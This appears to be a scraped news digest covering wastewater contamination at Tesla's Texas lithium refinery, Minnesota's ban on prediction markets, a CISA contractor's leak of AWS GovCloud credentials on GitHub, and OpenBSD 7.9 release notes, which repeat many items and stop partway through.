Lithium and vana­dium at con­cen­tra­tions Lazarte’s let­ter de­scribed as ab­nor­mally high rel­a­tive to rain­wa­ter or nor­mal ground­wa­ter.

Elevated lev­els of man­ganese, iron, phos­pho­rus, cal­cium, mag­ne­sium and potas­sium con­sis­tent with in­dus­trial dis­charge. Manganese, a bat­tery process tracer, can have neu­ro­log­i­cal ef­fects at chronic doses. Excess phos­pho­rus can cause al­gae blooms that strip oxy­gen from wa­ter­ways.

Ammonia in the form of ni­tro­gen at 1.68 mg/​L, am­pli­fy­ing the al­gae bloom risk.

Neither hexa­va­lent chromium nor ar­senic ap­pears in Tesla’s TCEQ dis­charge per­mit as an al­low­able pol­lu­tant. Neither was tested for dur­ing TCEQs February in­ves­ti­ga­tion.

Mazloum, whose tech­ni­cal re­port has since been dis­trib­uted to Texas state leg­is­la­tors, de­scribes the lithium sig­na­ture in the waste­water as a fingerprint at a crime scene,” and rec­om­mends that Tesla de­sign and fund an on-site multi-stage treat­ment plant us­ing in­dus­trial re­verse os­mo­sis to strip heavy met­als out of the dis­charge. He has also told the Texas Tribune that the el­e­vated salt con­tent is killing the grass that holds the drainage ditch walls to­gether, with the bare soil wash­ing away in rain and re­duc­ing the ditch’s ca­pac­ity to carry stormwa­ter. Mazloum rec­om­mends Robstown res­i­dents stay away from the ditch.

Lazarte’s cease-and-de­sist let­ter to Tesla’s as­so­ci­ate gen­eral coun­sel, sent in mid-April, asked the com­pany to halt waste­water dis­charge pend­ing a meet­ing to dis­cuss the lab re­sults. He called the find­ings quite dis­turb­ing” and wrote that the com­bi­na­tion of lithium, stron­tium and vana­dium in the sam­ple acted like a chem­i­cal sig­na­ture point­ing back to the bat­tery pro­cess­ing fa­cil­ity.”

What Tesla says

Tesla dis­putes the fram­ing. Jason Bevan, Senior Manager of Site Operations at the Robstown plant, said in a writ­ten state­ment that the com­pany routinely mon­i­tors and tests its per­mit­ted waste­water dis­charge” and remains in com­plete com­pli­ance with all re­quire­ments of its state-is­sued waste­water dis­charge per­mit, in­clud­ing ap­plic­a­ble wa­ter qual­ity stan­dards.” Bevan added that Tesla is currently re­view­ing the let­ter from Nueces County Drainage District #2 and looks for­ward to work­ing co­op­er­a­tively with the dis­trict to ad­dress their con­cerns.”

Tesla also ar­gues that the Eurofins sam­pling method­ol­ogy was in­ap­pro­pri­ate, be­cause the lab placed its sam­pling equip­ment in the ditch down­stream of the out­fall pipe rather than at the out­fall it­self. The per­mit re­quires mon­i­tor­ing at the out­fall point, and the com­pany has pointed out that ditch sam­ples can pick up con­t­a­m­i­nants from sources that have noth­ing to do with Tesla’s waste­water. This is a real ar­gu­ment, and a court con­sid­er­ing the data will have to weigh it. The drainage dis­tric­t’s re­sponse, as ex­pressed by Lazarte’s let­ter, is that the chem­i­cal fin­ger­print in the sam­ple matches the fa­cil­i­ty’s process, not a ran­dom en­vi­ron­men­tal back­ground.

Notably, no party has al­leged that Tesla is in vi­o­la­tion of any law. TCEQ has not found one. Tesla is op­er­at­ing un­der a per­mit the state agency is­sued. The dis­pute, in­stead, is about what the per­mit was sup­posed to cover, and what got left out of it.

Why South Texas, and why now

The tim­ing is what makes this story sting. Corpus Christi, six­teen miles east of the Tesla re­fin­ery, is prepar­ing to de­clare a wa­ter emer­gency. The city’s reser­voirs have been de­scribed in pub­lic meet­ings as fac­ing imminent de­ple­tion” if rain­fall does not ar­rive, and emer­gency wa­ter-use re­stric­tions are ex­pected to be en­acted in September if con­di­tions do not im­prove. The state, more broadly, is in the mid­dle of se­vere drought con­di­tions across most of the af­fected basins.

The plant in Robstown is sup­posed to be part of the so­lu­tion to the United States’ lithium sup­ply prob­lem. Battery-grade lithium hy­drox­ide is the bot­tle­neck in the do­mes­tic EV bat­tery sup­ply chain that Tesla, Ford, GM and every other US au­tomaker is rac­ing to scale. Tesla’s Robstown fa­cil­ity, if it per­forms at de­sign ca­pac­ity, would be the first ma­jor piece of that sup­ply chain to come fully on­line on US soil. Elon Musk has re­peat­edly cited the re­fin­ery as ev­i­dence that lithium pro­duc­tion does not have to be the dirty, acid-in­ten­sive process it has his­tor­i­cally been every­where else in the world.

That ar­gu­ment now has trace con­cen­tra­tions of hexa­va­lent chromium and el­e­vated lithium sit­ting in a drainage ditch six­teen miles from a coastal city about to ra­tion drink­ing wa­ter. The sub­stances may or may not ex­ceed any in­di­vid­ual reg­u­la­tory thresh­old. The com­bi­na­tion of them, leav­ing a re­fin­ery that was mar­keted as the clean­est in the world, in a county that is run­ning out of wa­ter, is the story.

What an American dri­ver should take away from this

The cease-and-de­sist let­ter has not yet been an­swered. TCEQ has not re­opened its in­ves­ti­ga­tion. Tesla is still op­er­at­ing the plant. The pipe is still dis­charg­ing. None of this is il­le­gal as cur­rently con­sti­tuted, be­cause the per­mit that was writ­ten does not re­quire mon­i­tor­ing for the things the in­de­pen­dent lab found.

What it should do, for any American dri­ver whose next EV is go­ing to be built around do­mes­ti­cally re­fined lithium, is force a real con­ver­sa­tion about what clean lithium” ac­tu­ally means and who gets to de­fine it. Tesla called its process acid-free. The waste­water leav­ing the fa­cil­ity, on the day Eurofins sam­pled it, con­tained a known car­cino­gen above a de­tec­tion thresh­old, an en­vi­ron­men­tal poi­son be­low the drink­ing wa­ter stan­dard but pre­sent, and ab­nor­mally el­e­vated lev­els of the very metal the plant was built to pro­duce. None of those facts are in dis­pute. What they mean is.

Minnesota becomes first state to ban prediction markets

www.npr.org

Minnesota has en­acted the most far-reach­ing crack­down on mas­sively pop­u­lar ser­vices like Kalshi and Polymarket.

Steve Karnowski/Associated Press

hide cap­tion

tog­gle cap­tion

Steve Karnowski/Associated Press

Minnesota Gov. Tim Walz has signed the na­tion’s first law ban­ning pre­dic­tion mar­ket sites from op­er­at­ing in the state, and in re­sponse, the Trump ad­min­is­tra­tion has sued, tee­ing up a le­gal bat­tle over the most far-reach­ing crack­down on pop­u­lar ser­vices like Kalshi and Polymarket.

It comes as states con­front a grow­ing stand­off with the Trump ad­min­is­tra­tion over how to reg­u­late the in­dus­try, which al­lows peo­ple to bet on vir­tu­ally any­thing.

The new state law makes it a crime to host or ad­ver­tise a pre­dic­tion mar­ket, which it de­fines as a sys­tem that lets con­sumers place a wa­ger on a fu­ture out­come, like sports, elec­tions, live en­ter­tain­ment, some­one’s word choice and world af­fairs.

The pro­hi­bi­tion ex­tends to ser­vices sup­port­ing pre­dic­tion mar­kets, like vir­tual pri­vate net­works, that could al­low con­sumers to dis­guise their lo­ca­tion and get around the ban.

It would force pre­dic­tion mar­ket sites like Kalshi and Polymarket to leave the state, or face pos­si­ble felony charges. The law takes ef­fect in August.

We as a state should de­cide how best and what reg­u­la­tions we think should at­tach to gam­bling, to pro­tect pub­lic safety, to pro­tect our kids,” said Minnesota Rep. Emma Greenman, the Democrat who in­tro­duced the mea­sure.

The law has a carve-out for event con­tracts that serve as an in­sur­ance pol­icy in the event of harm, or loss sus­tained” and for the pur­chase of se­cu­ri­ties and other com­modi­ties.

The Commodity Futures Trading Commission’s law­suit seeks to block the law be­fore it starts, ar­gu­ing the pre­dic­tion mar­ket in­dus­try should be ex­clu­sively reg­u­lated by fed­eral of­fi­cials.

This Minnesota law turns law­ful op­er­a­tors and par­tic­i­pants in pre­dic­tion mar­kets into felons overnight,” said CFTC Chairman Michael Selig. Minnesota farm­ers have re­lied on crit­i­cal hedg­ing prod­ucts on weather and crop-re­lated events for decades to mit­i­gate their risks. Governor Walz chose to put spe­cial in­ter­ests first and American farm­ers and in­no­va­tors last.”

An up­dated ver­sion of the pre­dic­tion mar­ket bill al­lows trad­ing on weather, an ex­cep­tion that fol­lowed push­back from the agri­cul­tural in­dus­try, which has his­tor­i­cally used fu­tures trad­ing on weather as a hedge against storms and other in­clement weather that can af­fect a har­vest. Walz is ex­pected to sign it soon.

Besides Minnesota, bills crack­ing down on the pre­dic­tion mar­ket in­dus­try have been in­tro­duced in seven other states, ac­cord­ing to the National Conference of State Legislators. Two of those states, Hawaii and North Carolina, have pend­ing bills seek­ing to ban the in­dus­try statewide.

Experts say the cloud of le­gal un­cer­tainty hang­ing over pre­dic­tion mar­kets apps have not slowed their rapid growth.

The states are us­ing any tac­tic they can to go af­ter the pre­dic­tion mar­ket com­pa­nies,” said Melinda Roth, a pro­fes­sor at Washington and Lee University’s School of Law, who stud­ies the in­dus­try. But they’ve em­barked on a too big to fail strat­egy and have be­come quite main­stream,” she said. It will be hard to put that ge­nie back in the bot­tle.”

A le­gal fight over the Minnesota ban is ex­pected. Questions over whether states or the fed­eral gov­ern­ment should over­see the pre­dic­tion mar­ket in­dus­try have al­ready trig­gered more than 20 law­suits. One of those cases, in Nevada, led to Kalshi paus­ing its sports bet­ting in the state af­ter a judge found it indistinguishable” from state-reg­u­lated sports gam­bling.

The Commodity Futures Trading Commission has filed fed­eral law­suits against five states, in­clud­ing Arizona, Wisconsin and New York, at­tempt­ing to over­ride state reg­u­la­tors’ at­tempts to rein in the bet­ting sites.

The CFTC has ar­gued it has ex­clu­sive ju­ris­dic­tion over pre­dic­tion mar­kets, even though for­mer CFTC mem­bers and le­gal ex­perts say bets on foot­ball games, words President Trump might say dur­ing a press con­fer­ence and whether Ricky Martin will make an ap­pear­ance at the Super Bowl are mat­ters far out­side its tra­di­tional scope.

In a state­ment to NPR, Kalshi spokes­woman Elisabeth Diana said ban­ning pre­dic­tion mar­kets is a blatant vi­o­la­tion” of the law.

Minnesota ban­ning pre­dic­tion mar­kets is like try­ing to ban the New York Stock Exchange,” said Diana, adding that this ac­tively harms users be­cause it re­duces com­pe­ti­tion and dri­ves ac­tiv­ity off­shore.”

A Polymarket spokesman told NPR that Minnesota’s ban runs counter to the fed­eral gov­ern­men­t’s established frame­work” for reg­u­lat­ing pre­dic­tion mar­kets.

Tribal-owned casi­nos op­er­ate in Minnesota, but on­line gam­bling and sports bet­ting are not le­gal in the state.

Prediction mar­kets like Kalshi and Polymarket have given ac­cess to sports bet­ting to peo­ple in states where the ac­tiv­ity is pro­hib­ited, since the Trump ad­min­is­tra­tion reg­u­lates the sites as a type of event con­tract,” rather than gam­bling, which typ­i­cally is over­seen by state gam­ing au­thor­i­ties.

Nonetheless, sports gam­bling pow­ers the sites. On Kalshi, for in­stance, more than 85% of trad­ing ac­tiv­ity is re­lated to a sport­ing event, some of those trades be­ing parlays,” high-risk wa­gers that mul­ti­ple things, points scored, fouls, passes, will all hap­pen.

Bettors on the sites are mak­ing bil­lions of dol­lars in trades every week, even as ques­tions around in­sider trad­ing and how the mar­kets can cre­ate per­verse in­cen­tives for peo­ple to ma­nip­u­late real world out­comes con­tinue to vex the com­pa­nies.

Minnesota Public Radio News re­porters Dana Ferguson and Peter Cox con­tributed re­port­ing to this story.

CISA Admin Leaked AWS GovCloud Keys on Github

krebsonsecurity.com

Until this past week­end, a con­trac­tor for the Cybersecurity & Infrastructure Security Agency (CISA) main­tained a pub­lic GitHub repos­i­tory that ex­posed cre­den­tials to sev­eral highly priv­i­leged AWS GovCloud ac­counts and a large num­ber of in­ter­nal CISA sys­tems. Security ex­perts said the pub­lic archive in­cluded files de­tail­ing how CISA builds, tests and de­ploys soft­ware in­ter­nally, and that it rep­re­sents one of the most egre­gious gov­ern­ment data leaks in re­cent his­tory.

On May 15, KrebsOnSecurity heard from Guillaume Valadon, a re­searcher with the se­cu­rity firm GitGuardian. Valadon’s com­pany con­stantly scans pub­lic code repos­i­to­ries at GitHub and else­where for ex­posed se­crets, au­to­mat­i­cally alert­ing the of­fend­ing ac­counts of any ap­par­ent sen­si­tive data ex­po­sures. Valadon said he reached out be­cause the owner in this case was­n’t re­spond­ing and the in­for­ma­tion ex­posed was highly sen­si­tive.

A redacted screen­shot of the now-de­funct Private CISA repos­i­tory main­tained by a CISA con­trac­tor.

The GitHub repos­i­tory that Valadon flagged was named Private-CISA,” and it har­bored a vast num­ber of in­ter­nal CISA/DHS cre­den­tials and files, in­clud­ing cloud keys, to­kens, plain­text pass­words, logs and other sen­si­tive CISA as­sets.

Valadon said the ex­posed CISA cre­den­tials rep­re­sent a text­book ex­am­ple of poor se­cu­rity hy­giene, not­ing that the com­mit logs in the of­fend­ing GitHub ac­count show that the CISA ad­min­is­tra­tor dis­abled the de­fault set­ting in GitHub that blocks users from pub­lish­ing SSH keys or other se­crets in pub­lic code repos­i­to­ries.

Passwords stored in plain text in a csv, back­ups in git, ex­plicit com­mands to dis­able GitHub se­crets de­tec­tion fea­ture,” Valadon wrote in an email. I hon­estly be­lieved that it was all fake be­fore an­a­lyz­ing the con­tent deeper. This is in­deed the worst leak that I’ve wit­nessed in my ca­reer. It is ob­vi­ously an in­di­vid­u­al’s mis­take, but I be­lieve that it might re­veal in­ter­nal prac­tices.”

One of the ex­posed files, ti­tled importantAWStokens,” in­cluded the ad­min­is­tra­tive cre­den­tials to three Amazon AWS GovCloud servers. Another file ex­posed in their pub­lic GitHub repos­i­tory — AWS-Workspace-Firefox-Passwords.csv” — listed plain­text user­names and pass­words for dozens of in­ter­nal CISA sys­tems. According to Caturegli, those sys­tems in­cluded one called LZ-DSO,” which ap­pears short for Landing Zone DevSecOps,” the agen­cy’s se­cure code de­vel­op­ment en­vi­ron­ment.

Philippe Caturegli, founder of the se­cu­rity con­sul­tancy Seralys, said he tested the AWS keys only to see whether they were still valid and to de­ter­mine which in­ter­nal sys­tems the ex­posed ac­counts could ac­cess. Caturegli said the GitHub ac­count that ex­posed the CISA se­crets ex­hibits a pat­tern con­sis­tent with an in­di­vid­ual op­er­a­tor us­ing the repos­i­tory as a work­ing scratch­pad or syn­chro­niza­tion mech­a­nism rather than a cu­rated pro­ject repos­i­tory.

The use of both a CISA-associated email ad­dress and a per­sonal email ad­dress sug­gests the repos­i­tory may have been used across dif­fer­ently con­fig­ured en­vi­ron­ments,” Caturegli ob­served. The avail­able Git meta­data alone does not prove which end­point or de­vice was used.”

The Private CISA GitHub repo ex­posed dozens of plain­text cre­den­tials for im­por­tant CISA GovCloud re­sources.

Caturegli said he val­i­dated that the ex­posed cre­den­tials could au­then­ti­cate to three AWS GovCloud ac­counts at a high priv­i­lege level. He said the archive also in­cludes plain text cre­den­tials to CISAs in­ter­nal artifactory” — es­sen­tially a repos­i­tory of all the code pack­ages they are us­ing to build soft­ware — and that this would rep­re­sent a juicy tar­get for ma­li­cious at­tack­ers look­ing for ways to main­tain a per­sis­tent foothold in CISA sys­tems.

That would be a prime place to move lat­er­ally,” he said. Backdoor in some soft­ware pack­ages, and every time they build some­thing new they de­ploy your back­door left and right.”

In re­sponse to ques­tions, a spokesper­son for CISA said the agency is aware of the re­ported ex­po­sure and is con­tin­u­ing to in­ves­ti­gate the sit­u­a­tion.

Currently, there is no in­di­ca­tion that any sen­si­tive data was com­pro­mised as a re­sult of this in­ci­dent,” the CISA spokesper­son wrote. While we hold our team mem­bers to the high­est stan­dards of in­tegrity and op­er­a­tional aware­ness, we are work­ing to en­sure ad­di­tional safe­guards are im­ple­mented to pre­vent fu­ture oc­cur­rences.”

A re­view of the GitHub ac­count and its ex­posed pass­words show the Private CISA repos­i­tory was main­tained by an em­ployee of Nightwing, a gov­ern­ment con­trac­tor based in Dulles, Va. Nightwing de­clined to com­ment, di­rect­ing in­quiries to CISA.

CISA has not re­sponded to ques­tions about the po­ten­tial du­ra­tion of the data ex­po­sure, but Caturegli said the Private CISA repos­i­tory was cre­ated on November 13, 2025. The con­trac­tor’s GitHub ac­count was cre­ated back in September 2018.

The GitHub ac­count that in­cluded the Private CISA repo was taken of­fline shortly af­ter both KrebsOnSecurity and Seralys no­ti­fied CISA about the ex­po­sure. But Caturegli said the ex­posed AWS keys in­ex­plic­a­bly con­tin­ued to re­main valid for an­other 48 hours.

CISA is cur­rently op­er­at­ing with only a frac­tion of its nor­mal bud­get and staffing lev­els. The agency has lost nearly a third of its work­force since the be­gin­ning of the sec­ond Trump ad­min­is­tra­tion, which forced a se­ries of early re­tire­ments, buy­outs, and res­ig­na­tions across the agen­cy’s var­i­ous di­vi­sions.

The now-de­funct Private CISA repo showed the con­trac­tor also used eas­ily-guessed pass­words for a num­ber of in­ter­nal re­sources; for ex­am­ple, many of the cre­den­tials used a pass­word con­sist­ing of each plat­for­m’s name fol­lowed by the cur­rent year. Caturegli said such prac­tices would con­sti­tute a se­ri­ous se­cu­rity threat for any or­ga­ni­za­tion even if those cre­den­tials were never ex­posed ex­ter­nally, not­ing that threat ac­tors of­ten use key cre­den­tials ex­posed on the in­ter­nal net­work to ex­pand their reach af­ter es­tab­lish­ing ini­tial ac­cess to a tar­geted sys­tem.

What I sus­pect hap­pened is [the CISA con­trac­tor] was us­ing this GitHub to syn­chro­nize files be­tween a work lap­top and a home com­puter, be­cause he has reg­u­larly com­mit­ted to this repo since November 2025,” Caturegli said. This would be an em­bar­rass­ing leak for any com­pany, but it’s even more so in this case be­cause it’s CISA.”

OpenBSD 7.9

www.openbsd.org

7.9 Song: Diamond in the Rough” Artwork by Lyra Henderson.

See the in­for­ma­tion on the FTP page for a list of mir­ror ma­chines.

Go to the pub/​OpenBSD/​7.9/ di­rec­tory on one of the mir­ror sites.

Have a look at the 7.9 er­rata page for a list of bugs and workarounds.

See a de­tailed log of changes be­tween the 7.8 and 7.9 re­leases.

sig­nify(1) pub­keys for this re­lease:

openbsd-79-base.pub:

RWTSdNN9A3yvWNn7mUjXwv9DOCOUnyfuV+mq1iGPIfD+NhN8EYnEQ1at openbsd-79-fw.pub:

RWQdmBb/OCe1hXE08xCj5VLnBpGpphy7kYPdU3oWyfnrwswjtl8K385E

openbsd-79-pkg.pub:

RWSw1kDLJJy6OYgnayEMReLV57z2rzx5jYNCghO+2ARwqd6KuwGFWSn7

openbsd-79-sys­patch.pub:

RWTJmz/ur68S9e26/JVRr7T88lAPZIF3YgZ3w2lDnf/frAxTerC/DrZ6

All ap­plic­a­ble copy­rights and cred­its are in the src.tar.gz, sys.tar.gz, xeno­cara.tar.gz, ports.tar.gz files, or in the files fetched via ports.tar.gz.

What’s New

This is a par­tial list of new fea­tures and sys­tems in­cluded in OpenBSD 7.9. For a com­pre­hen­sive list, see the changelog lead­ing to 7.9.

Platform-specific im­prove­ments:

ar­m64:

Enabled ice(4) on ar­m64. Added sup­port for the RK3588 and RK3576 SoCs with new or ad­di­tions to ex­ist­ing dri­vers. Added sup­port for the Genesys Logic GL9755 SDHC con­troller (which in­cludes the SDHC con­troller on some of the Apple Silicon lap­tops) to sd­mmc(4).

amd64:

Added SMU sup­port to amdpmc(4). The SMU is a mi­cro­con­troller buried deep in the bow­els of AMD SoCs and needs to be tick­led in or­der to reach the low­est power states in sus­pend. Disabled Panel Self Refresh (PSR) in amdgpu to avoid a po­ten­tial hang on a ThinkPad X13 gen 6. Increased MAXCPUs on amd64 to 255. On amd64, we now zero the DM PTE/PDE pages be­fore use. This fixes a bug on ma­chines with more than 512GB RAM. Mitigated float­ing point state leak­age ob­served on AMD Zen/Zen+ (Zen 1).

lu­na88k:

Switched lu­na88k com­piler to gcc4. Switched lu­na88k to PIE (Position Independent Executables) by de­fault.

riscv64: Systems with a SpacemiT K1 SoC gained sup­port with the fol­low­ing (and more) changes:

Added smt­clock(4), a dri­ver for the clock/​re­set con­troller on the SpacemiT K1 SoC. Added many more dri­vers to sup­port the SpacemiT K1 SoC. Implemented sup­port for the Zicbom (Cache-Block Management) and Svpbmt (Page-Based Memory Types) ex­ten­sions. Added the SpacemiT K1 de­vice trees onto the riscv64 mini­root mak­ing them ac­ces­si­ble dur­ing in­stal­la­tion. Made Instruction ac­cess fault” (EXCP_FAULT_FETCH) traps be­ing treated as PROT_EXEC. This fixes ran­dom SIGSEGV on the SpacemiT X60 cores. Added SpacemiT K1 sup­port to dw­p­cie(4).

Other ar­chi­tec­tures:

Fixed var­i­ous er­rors on big-en­dian sys­tems in ice(4) to make it work on spar­c64. Changed pow­er­pc64 mem­ory bar­ri­ers to sync”. Reworked and im­proved TLB shoot­down on al­pha. Hoisted mip­s64 CPU ac­count­ing to get mul­ti­ple soft­net threads on MP sys­tems. Made sure to ini­tial­ize all FPU reg­is­ters on spar­c64 to all 1 (or -NaN), and not only the lower 32 reg­is­ters. Fixed park­ing mu­tex on sun4u spar­c64 cpus.

More plat­form-spe­cific changes can be found in the hard­ware sup­port sec­tion be­low.

ar­m64:

Enabled ice(4) on ar­m64. Added sup­port for the RK3588 and RK3576 SoCs with new or ad­di­tions to ex­ist­ing dri­vers. Added sup­port for the Genesys Logic GL9755 SDHC con­troller (which in­cludes the SDHC con­troller on some of the Apple Silicon lap­tops) to sd­mmc(4).

Enabled ice(4) on ar­m64.

Added sup­port for the RK3588 and RK3576 SoCs with new or ad­di­tions to ex­ist­ing dri­vers.

Added sup­port for the Genesys Logic GL9755 SDHC con­troller (which in­cludes the SDHC con­troller on some of the Apple Silicon lap­tops) to sd­mmc(4).

amd64:

Added SMU sup­port to amdpmc(4). The SMU is a mi­cro­con­troller buried deep in the bow­els of AMD SoCs and needs to be tick­led in or­der to reach the low­est power states in sus­pend. Disabled Panel Self Refresh (PSR) in amdgpu to avoid a po­ten­tial hang on a ThinkPad X13 gen 6. Increased MAXCPUs on amd64 to 255. On amd64, we now zero the DM PTE/PDE pages be­fore use. This fixes a bug on ma­chines with more than 512GB RAM. Mitigated float­ing point state leak­age ob­served on AMD Zen/Zen+ (Zen 1).

Added SMU sup­port to amdpmc(4). The SMU is a mi­cro­con­troller buried deep in the bow­els of AMD SoCs and needs to be tick­led in or­der to reach the low­est power states in sus­pend.

Disabled Panel Self Refresh (PSR) in amdgpu to avoid a po­ten­tial hang on a ThinkPad X13 gen 6.

Increased MAXCPUs on amd64 to 255.

On amd64, we now zero the DM PTE/PDE pages be­fore use. This fixes a bug on ma­chines with more than 512GB RAM.

Mitigated float­ing point state leak­age ob­served on AMD Zen/Zen+ (Zen 1).

lu­na88k:

Switched lu­na88k com­piler to gcc4. Switched lu­na88k to PIE (Position Independent Executables) by de­fault.

Switched lu­na88k com­piler to gcc4.

Switched lu­na88k to PIE (Position Independent Executables) by de­fault.

riscv64: Systems with a SpacemiT K1 SoC gained sup­port with the fol­low­ing (and more) changes:

Added smt­clock(4), a dri­ver for the clock/​re­set con­troller on the SpacemiT K1 SoC. Added many more dri­vers to sup­port the SpacemiT K1 SoC. Implemented sup­port for the Zicbom (Cache-Block Management) and Svpbmt (Page-Based Memory Types) ex­ten­sions. Added the SpacemiT K1 de­vice trees onto the riscv64 mini­root mak­ing them ac­ces­si­ble dur­ing in­stal­la­tion. Made Instruction ac­cess fault” (EXCP_FAULT_FETCH) traps be­ing treated as PROT_EXEC. This fixes ran­dom SIGSEGV on the SpacemiT X60 cores. Added SpacemiT K1 sup­port to dw­p­cie(4).

Added smt­clock(4), a dri­ver for the clock/​re­set con­troller on the SpacemiT K1 SoC.

Added many more dri­vers to sup­port the SpacemiT K1 SoC.

Implemented sup­port for the Zicbom (Cache-Block Management) and Svpbmt (Page-Based Memory Types) ex­ten­sions.

Added the SpacemiT K1 de­vice trees onto the riscv64 mini­root mak­ing them ac­ces­si­ble dur­ing in­stal­la­tion.

Made Instruction ac­cess fault” (EXCP_FAULT_FETCH) traps be­ing treated as PROT_EXEC. This fixes ran­dom SIGSEGV on the SpacemiT X60 cores.

Added SpacemiT K1 sup­port to dw­p­cie(4).

Other ar­chi­tec­tures:

Fixed var­i­ous er­rors on big-en­dian sys­tems in ice(4) to make it work on spar­c64. Changed pow­er­pc64 mem­ory bar­ri­ers to sync”. Reworked and im­proved TLB shoot­down on al­pha. Hoisted mip­s64 CPU ac­count­ing to get mul­ti­ple soft­net threads on MP sys­tems. Made sure to ini­tial­ize all FPU reg­is­ters on spar­c64 to all 1 (or -NaN), and not only the lower 32 reg­is­ters. Fixed park­ing mu­tex on sun4u spar­c64 cpus.

Fixed var­i­ous er­rors on big-en­dian sys­tems in ice(4) to make it work on spar­c64.

Changed pow­er­pc64 mem­ory bar­ri­ers to sync”.

Reworked and im­proved TLB shoot­down on al­pha.

Hoisted mip­s64 CPU ac­count­ing to get mul­ti­ple soft­net threads on MP sys­tems.

Made sure to ini­tial­ize all FPU reg­is­ters on spar­c64 to all 1 (or -NaN), and not only the lower 32 reg­is­ters.

Fixed park­ing mu­tex on sun4u spar­c64 cpus.

More plat­form-spe­cific changes can be found in the hard­ware sup­port sec­tion be­low.

Various ker­nel im­prove­ments:

Introduced a mech­a­nism to man­age CPU cores with dif­fer­ent speeds in the sched­uler. The sysctl(8) vari­able hw.blockcpu” takes a se­quence of 4 let­ters: S (for SMT), P (regular per­for­mance CPU), E (efficient CPU, gen­er­ally 80% to 50% as fast), and L (lethargic CPU) which are even slower. Set this to se­lect CPUs to kick out of the sched­uler (SL by de­fault). Currently works on amd64 and ar­m64. Replaced the cas spin­lock in ker­nel mu­texes with a parking” lock. Stopped forc­ing the page dae­mon to sleep when there are out­stand­ing pag­ing re­quests. Implemented a ddb(4) stop com­mand that sends a SIGSTOP to the spec­i­fied pid. Made ddb(4) out­put vis­i­ble when en­ter­ing ddb from X on amdgpu. Added in­fra­struc­ture to al­low fu­ture sup­port of up to 52 par­ti­tions per disk. Made changes to avoid mem­ory al­lo­ca­tion from within the swapen­crypt path of the pagedae­mon by pre-al­lo­cat­ing 32 swap­clus­ters up-front. Changed the strat­egy by which the pagedae­mon cre­ates free mem­ory by over­shoot­ing the cre­ation of in­ac­tive and free pages, in or­der to de­frag­ment mem­ory. Refuse to load a bi­nary with­out a PT_LOAD exec seg­ment.

Introduced a mech­a­nism to man­age CPU cores with dif­fer­ent speeds in the sched­uler. The sysctl(8) vari­able hw.blockcpu” takes a se­quence of 4 let­ters: S (for SMT), P (regular per­for­mance CPU), E (efficient CPU, gen­er­ally 80% to 50% as fast), and L (lethargic CPU) which are even slower. Set this to se­lect CPUs to kick out of the sched­uler (SL by de­fault). Currently works on amd64 and ar­m64.

Replaced the cas spin­lock in ker­nel mu­texes with a parking” lock.

Stopped forc­ing the page dae­mon to sleep when there are out­stand­ing pag­ing re­quests.

Implemented a ddb(4) stop com­mand that sends a SIGSTOP to the spec­i­fied pid.

Made ddb(4) out­put vis­i­ble when en­ter­ing ddb from X on amdgpu.

Added in­fra­struc­ture to al­low fu­ture sup­port of up to 52 par­ti­tions per disk.

Made changes to avoid mem­ory al­lo­ca­tion from within the swapen­crypt path of the pagedae­mon by pre-al­lo­cat­ing 32 swap­clus­ters up-front.

Changed the strat­egy by which the pagedae­mon cre­ates free mem­ory by over­shoot­ing the cre­ation of in­ac­tive and free pages, in or­der to de­frag­ment mem­ory.

Refuse to load a bi­nary with­out a PT_LOAD exec seg­ment.

Suspend/Hibernate Support:

Implemented de­layed hi­ber­na­tion: In or­der to pre­vent run­ning out of bat­tery while sus­pended, this fea­ture wakes up a sus­pended sys­tem af­ter a con­fig­urable time to then im­me­di­ately per­form a hi­ber­na­tion. The machdep.hi­ber­nat­ede­lay sysctl(2) is used to con­fig­ure the num­ber of sec­onds af­ter which the sys­tem will wake up from sus­pend and hi­ber­nate it­self.

Implemented de­layed hi­ber­na­tion: In or­der to pre­vent run­ning out of bat­tery while sus­pended, this fea­ture wakes up a sus­pended sys­tem af­ter a con­fig­urable time to then im­me­di­ately per­form a hi­ber­na­tion. The machdep.hi­ber­nat­ede­lay sysctl(2) is used to con­fig­ure the num­ber of sec­onds af­ter which the sys­tem will wake up from sus­pend and hi­ber­nate it­self.

SMP Improvements:

Unlocked socket splic­ing. Unlocked icm­p6_sysctl(). Unlocked the IGMP slow time­out. Enabled par­al­lel fault han­dling on amd64 and ar­m64. Made bse(4) in­ter­rupts mp-safe. Protected the IGMP and MLD6 fast timers with an rwlock.

Unlocked socket splic­ing.

Unlocked icm­p6_sysctl().

Unlocked the IGMP slow time­out.

Enabled par­al­lel fault han­dling on amd64 and ar­m64.

Made bse(4) in­ter­rupts mp-safe.

Protected the IGMP and MLD6 fast timers with an rwlock.

Direct Rendering Manager and graph­ics dri­vers:

Updated drm(4) to Linux 6.18.22.

Updated drm(4) to Linux 6.18.22.

VMM/VMD and vir­tu­al­iza­tion im­prove­ments:

Adopted PCI-based se­man­tics for read­ing un­sup­ported or in­valid reg­is­ters by re­turn­ing all 1′s. Newer Linux ker­nels have started us­ing 128-bit fea­ture spaces. Added sysctl(8) machdep.vm­mode to in­di­cate sta­tus as a host or guest (and SEV mode). Added vm­boot, a tiny ker­nel that al­lows sysup­grade(8) to work for vmd(8) VMs. Allowed cd(4)/​vioscsi(4) on a VM to use con­fi­den­tial com­put­ing meth­ods, e.g. AMD SEV. Fixed a seg­fault in vmd(8) dur­ing vmmci time­out fir­ing. Enabled 32-bit di­rect ker­nel launch for both amd64 and i386 in vmd(8). Fixed a race in vmd(8) vm pause bar­rier us­age. Fixed a race in vmm(4) vm ter­mi­na­tion path. Added em­u­la­tion of AMD SysCfg MSR in vmm(4). Made OpenBSD work on Apple Virtualization. Only ex­pose pv­clock(4) in vmm(4) if tsc fre­quency is known. Reduced vmd(8) lowmem area in the mem­ory map to help Linux guest re­boot is­sues. Prevented vmd(8) pause dead­lock when vcpu does­n’t halt. Fixed timer em­u­la­tion-re­lated OpenBSD-i386 VM hangs when us­ing the i8254 hard­ware time­counter with vmm(4). Made vio(4) re­cover from missed RX in­ter­rupts. Fixed vmd(8) vionet re­set race lead­ing to bro­ken net­work­ing.

Adopted PCI-based se­man­tics for read­ing un­sup­ported or in­valid reg­is­ters by re­turn­ing all 1′s. Newer Linux ker­nels have started us­ing 128-bit fea­ture spaces.

Added sysctl(8) machdep.vm­mode to in­di­cate sta­tus as a host or guest (and SEV mode).

Added vm­boot, a tiny ker­nel that al­lows sysup­grade(8) to work for vmd(8) VMs.

Allowed cd(4)/​vioscsi(4) on a VM to use con­fi­den­tial com­put­ing meth­ods, e.g. AMD SEV.

